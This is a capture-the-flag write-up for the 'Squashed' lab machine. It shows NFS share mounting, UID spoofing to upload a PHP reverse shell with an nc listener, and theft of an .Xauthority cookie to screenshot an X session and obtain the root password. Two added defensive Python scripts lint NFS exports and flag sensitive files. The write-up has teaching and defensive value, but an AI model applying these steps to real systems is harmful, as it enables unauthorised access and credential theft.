
Enumeration

$ sudo rustscan -t 3000 --tries 2 -b 8192 -u 16384 -a 10.129.228.109 -- -sS -sV -sC -oN 10.129.228.109.$(basename $PWD).nmap.txt
Open 10.129.228.109:22
Open 10.129.228.109:80
Open 10.129.228.109:111
Open 10.129.228.109:2049
Open 10.129.228.109:32955
Open 10.129.228.109:33383
Open 10.129.228.109:43643
Open 10.129.228.109:59091
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sS -sV -sC -oN 10.129.228.109.squashed.nmap.txt" on ip 10.129.228.109
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 13:49 PST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.00s elapsed
Initiating Ping Scan at 13:49
Scanning 10.129.228.109 [4 ports]
Completed Ping Scan at 13:49, 0.13s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:49
Completed Parallel DNS resolution of 1 host. at 13:49, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:49
Scanning 10.129.228.109 [8 ports]
Discovered open port 111/tcp on 10.129.228.109
Discovered open port 22/tcp on 10.129.228.109
Discovered open port 59091/tcp on 10.129.228.109
Discovered open port 32955/tcp on 10.129.228.109
Discovered open port 80/tcp on 10.129.228.109
Discovered open port 2049/tcp on 10.129.228.109
Discovered open port 33383/tcp on 10.129.228.109
Discovered open port 43643/tcp on 10.129.228.109
Completed SYN Stealth Scan at 13:49, 0.27s elapsed (8 total ports)
Initiating Service scan at 13:49
Scanning 8 services on 10.129.228.109
Completed Service scan at 13:49, 7.82s elapsed (8 services on 1 host)
NSE: Script scanning 10.129.228.109.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 4.51s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.59s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.00s elapsed
Nmap scan report for 10.129.228.109
Host is up, received echo-reply ttl 63 (0.18s latency).
Scanned at 2022-11-26 13:49:23 PST for 14s

PORT      STATE SERVICE  REASON         VERSION
22/tcp    open  ssh      syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| ssh-rsa ...
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=
|   256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR
80/tcp    open  http     syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Built Better
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.41 (Ubuntu)
111/tcp   open  rpcbind  syn-ack ttl 63 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      33383/tcp   mountd
|   100005  1,2,3      42507/udp   mountd
|   100005  1,2,3      43916/udp6  mountd
|   100005  1,2,3      56401/tcp6  mountd
|   100021  1,3,4      32955/tcp   nlockmgr
|   100021  1,3,4      38345/tcp6  nlockmgr
|   100021  1,3,4      41545/udp6  nlockmgr
|   100021  1,3,4      45219/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl  syn-ack ttl 63 3 (RPC #100227)
32955/tcp open  nlockmgr syn-ack ttl 63 1-4 (RPC #100021)
33383/tcp open  mountd   syn-ack ttl 63 1-3 (RPC #100005)
43643/tcp open  mountd   syn-ack ttl 63 1-3 (RPC #100005)
59091/tcp open  mountd   syn-ack ttl 63 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds
           Raw packets sent: 12 (504B) | Rcvd: 11 (460B)
Ports  Service     Notes
22     ssh
80     web server
111    rpc
2049   nfs

Exploitation

I saw we have ports 111 and 2049 which tell me there’s an NFS server and possibly something we can remotely mount and read.

We had to create some temporary users to map the UIDs and GIDs, so we created a "ross" user with UID/GID 1001/1001 and an "alex" user with UID/GID 2017/2017. This allowed us to write files as alex to /var/www/html, so we mounted /var/www/html and uploaded a PHP reverse shell. This allowed us to get the user flag.

$ showmount -e $ip
Export list for 10.129.228.109:
/home/ross    *
/var/www/html *

$ sudo mount -t nfs $ip:/home/ross /tmp/nfsmount
$ tree /tmp/nfsmount
/tmp/nfsmount
├── Desktop
├── Documents
│   └── Passwords.kdbx
├── Downloads
├── Music
├── Pictures
├── Public
├── Templates
└── Videos

$ sudo mount -t nfs -o rw $ip:/var/www/html /tmp/nfsmount
$ echo 'php shell' > /tmp/nfsmount/rev.php
$ nc -lvnp 32000
# Browse to <http://$ip/rev.php>
$ cat /home/alex/user.txt
user-flag
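The whole foothold rests on two export settings: everything is exported to `*`, and only root_squash is in effect, so a client that is root on its own machine can present any other UID (1001 for ross, 2017 for alex) and the server trusts it. The following linter is an added example written for this writeup, not the author's tooling or anything from the box; it parses exports(5)-style lines and flags exactly those weaknesses, with the fix beside each finding. The exports text inside it is constructed (the first two lines mirror what showmount returned above, the rest are made up for contrast), and the option semantics follow the exports(5) man page.

```python
"""Lint /etc/exports-style lines for the weaknesses this box demonstrates.

Added example for this writeup, not the box's or the author's code. The
exports text below is constructed; the option semantics follow exports(5).
"""
import re
from dataclasses import dataclass

# Constructed sample: the first two lines mirror what showmount showed on the
# box (everything exported to "*"), the other two are made up for contrast.
SAMPLE_EXPORTS = """\
/home/ross    *(rw,sync,no_subtree_check)
/var/www/html *(rw,sync,no_subtree_check)
/backup       192.168.1.5(rw,no_root_squash)
/srv/share    10.0.0.0/24(ro,sync,root_squash,all_squash,anonuid=65534,anongid=65534)
"""

WEB_ROOTS = ("/var/www",)
HOME_ROOTS = ("/home", "/root")


@dataclass
class Export:
    path: str
    client: str
    options: tuple


def parse_exports(text):
    """Split exports(5) lines into (path, client, options) triples."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        path, *specs = line.split()
        if not specs:                          # bare path: everyone, default options
            exports.append(Export(path, "*", ()))
            continue
        for spec in specs:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            client = m.group(1) or "*"         # "(rw)" with no host also means everyone
            opts = tuple(o.strip() for o in (m.group(2) or "").split(",") if o.strip())
            exports.append(Export(path, client, opts))
    return exports


def _under(path, roots):
    return any(path == r or path.startswith(r + "/") for r in roots)


def lint_exports(text):
    """Return a list of findings, each a dict with path, client, issue and fix."""
    findings = []
    for ex in parse_exports(text):
        def flag(issue, fix, ex=ex):
            findings.append({"path": ex.path, "client": ex.client,
                             "issue": issue, "fix": fix})

        if ex.client in ("*", ""):
            flag("exported to every host",
                 "restrict to the client hosts or subnet that need it")
        if "rw" in ex.options:
            flag("writable export", "use ro unless clients must write")
        if "no_root_squash" in ex.options:
            flag("client root keeps uid 0 on the server", "remove no_root_squash")
        if "all_squash" not in ex.options:
            # root_squash alone only remaps uid 0: a client that is root on its
            # own host can present any other uid, which is how the writeup
            # above read ross's home and wrote into alex's web root.
            flag("client-supplied uids are trusted (no all_squash)",
                 "add all_squash,anonuid=<nobody>,anongid=<nogroup>, or use "
                 "sec=krb5p so identity is not taken from the packet")
        if _under(ex.path, WEB_ROOTS) and "rw" in ex.options:
            flag("web root writable over NFS (arbitrary file upload)",
                 "do not export the document root, or export it ro")
        if _under(ex.path, HOME_ROOTS):
            flag("home directory export (dotfiles such as .Xauthority, .ssh)",
                 "export a dedicated share, not user homes")
    return findings


def print_report(text=SAMPLE_EXPORTS):
    for f in lint_exports(text):
        print(f"{f['path']} -> {f['client']}: {f['issue']} (fix: {f['fix']})")


if __name__ == "__main__":
    print_report()
```

Against the constructed sample the two box-like lines each produce four findings and the `/srv/share` line none; the `/backup` line shows that a host restriction alone does not help while `rw` and `no_root_squash` remain. The all_squash check is the one that matters most on this box: it is the difference between "root_squash protects us" and "any client root can be any user".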

Privilege Escalation

From here the privilege escalation was a little tricky and I had to Google a lot about the .Xauthority file, session hijacking, and additionally read the writeup to learn about dumping a screenshot of the remote X window sessions with xwd and to read the dumped X image with xwud.

# On the mounted /home/ross mount
$ cat .Xauthority | base64

# On the reverse shell as alex
$ echo -n 'AQAADHN....' | base64 -d > /tmp/xauth
$ export XAUTHORITY=/tmp/xauth
$ xauth list
squashed.htb/unix:0  MIT-MAGIC-COOKIE-1  218a2a0921d8a7d657cea649446baae8
$ xwd -root -screen -silent -display :0 > /var/www/html/screen.xwd

# Download the screen dump at <http://$ip/screen.xwd> to attacker box

# Back on the attacker box
$ xwud -in screen.xwd
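The file that made this step possible, `.Xauthority`, is mode 0600 on the server, and that mode did nothing: over an export that trusts client UIDs, the cookie is readable by whoever claims uid 1001. A defender reviewing exports therefore needs to know which secret-bearing files sit inside an exported tree regardless of their mode. The script below is an added example written for this writeup, not the author's or the box's code; it walks an export root and reports the sensitive files it finds with their mode and owner. The home directory layout is constructed in a temporary directory (modelled on the `tree` output above) so that it runs offline; on a real server you would call `audit_export()` on each path listed in `/etc/exports`.

```python
"""Audit an NFS-exported tree for secrets that client-side UID spoofing exposes.

Added example for this writeup, not the box's or the author's code. The
directory layout is constructed in a temp dir so the script runs offline; on
a real host, point audit_export() at each path from /etc/exports.
"""
import fnmatch
import os
import stat
import tempfile
from pathlib import Path

# File names whose presence inside an export is a finding on its own.
# With root_squash only, an owner-only mode on these does not help: a client
# presenting the owner's uid reads them, as the .Xauthority step above shows.
SENSITIVE_NAMES = (
    ".Xauthority", "*.kdbx", "*.kdb", ".netrc", ".bash_history",
    "id_rsa", "id_ecdsa", "id_ed25519", "authorized_keys",
)


def audit_export(export_root):
    """Walk export_root and return a finding for every sensitive file found."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(export_root):
        for name in filenames:
            if not any(fnmatch.fnmatch(name, pat) for pat in SENSITIVE_NAMES):
                continue
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            mode = stat.S_IMODE(st.st_mode)
            findings.append({
                "path": os.path.relpath(full, export_root),
                "mode": f"{mode:04o}",
                "uid": st.st_uid,
                # world-readable files are exposed to *any* NFS client uid;
                # owner-only files are still exposed to a spoofed owner uid
                "world_readable": bool(mode & stat.S_IROTH),
            })
    return sorted(findings, key=lambda f: f["path"])


def build_sample_home():
    """Create a constructed home directory resembling the tree listing above."""
    root = tempfile.mkdtemp(prefix="nfs-audit-")
    layout = {
        ".Xauthority": 0o600,                # the X cookie the writeup copied
        ".ssh/id_ed25519": 0o600,
        "Documents/Passwords.kdbx": 0o644,   # the database seen on the desktop
        "Documents/notes.txt": 0o644,        # benign, must not be reported
        "Desktop/.keep": 0o644,
    }
    for rel, mode in layout.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(b"constructed sample content\n")
        p.chmod(mode)
    return root


if __name__ == "__main__":
    home = build_sample_home()
    for f in audit_export(home):
        print(f"{f['path']:<28} mode={f['mode']} uid={f['uid']} "
              f"world_readable={f['world_readable']}")
```

The report lists `.Xauthority` and the SSH key at 0600 alongside the world-readable `.kdbx`; the point of keeping the mode in the output is that the 0600 entries are the ones an administrator would otherwise assume are safe. Any hit inside an export that lacks `all_squash` (or Kerberos authentication) should be treated as readable by every host the export is visible to.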

From running the xwud command we get a screenshot of the desktop of the ross user with a lovely shot of his KeePass database open with the password for the root user in the image.

Using this password we can escalate to root and get the user flag.

$ su - root